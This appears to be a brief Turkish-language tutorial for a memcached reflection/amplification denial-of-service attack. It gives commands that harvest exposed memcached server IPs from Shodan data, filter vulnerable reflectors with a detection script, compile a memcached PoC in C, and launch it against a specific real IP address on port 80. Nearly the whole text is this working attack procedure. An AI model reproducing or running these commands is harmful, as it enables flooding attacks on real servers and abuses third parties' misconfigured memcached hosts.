Shodan dan memcached servislerini bu şekilde artıyoruz.
Hazırlanan dosyayı parse etmek için shodan’ı kuruyuruz ve metin belgesine ipleri yazıyoruz.
easy_install shodan
shodan parse --fields ip_str shodan_data.json 1> a.txt
Buradan BGA’nın Memcached servisi için hazırladığı scriptini indiriyoruz.
Buradan da memcached-PoC dosyasını çekiyoruz ve çalışan sunucuları buluyoruz.
./detect_vuln_memcached.sh -f a.txt -w 3 -t 120 | tee b.txt
Çıktı karışık bir çıktı olduğundan çıktıyı temizliyoruz.
grep '[OK]' b.txt | cut -d '>' -f2- | cut -d ":" -f1 | sed -r 's/\s+//g' > c.txt
Compile: gcc memcached.c -o memecached -pthread
./memecached 138.201.36.205 80 c.txt 800 20 1
Test sunucusunda nload kuruyoruz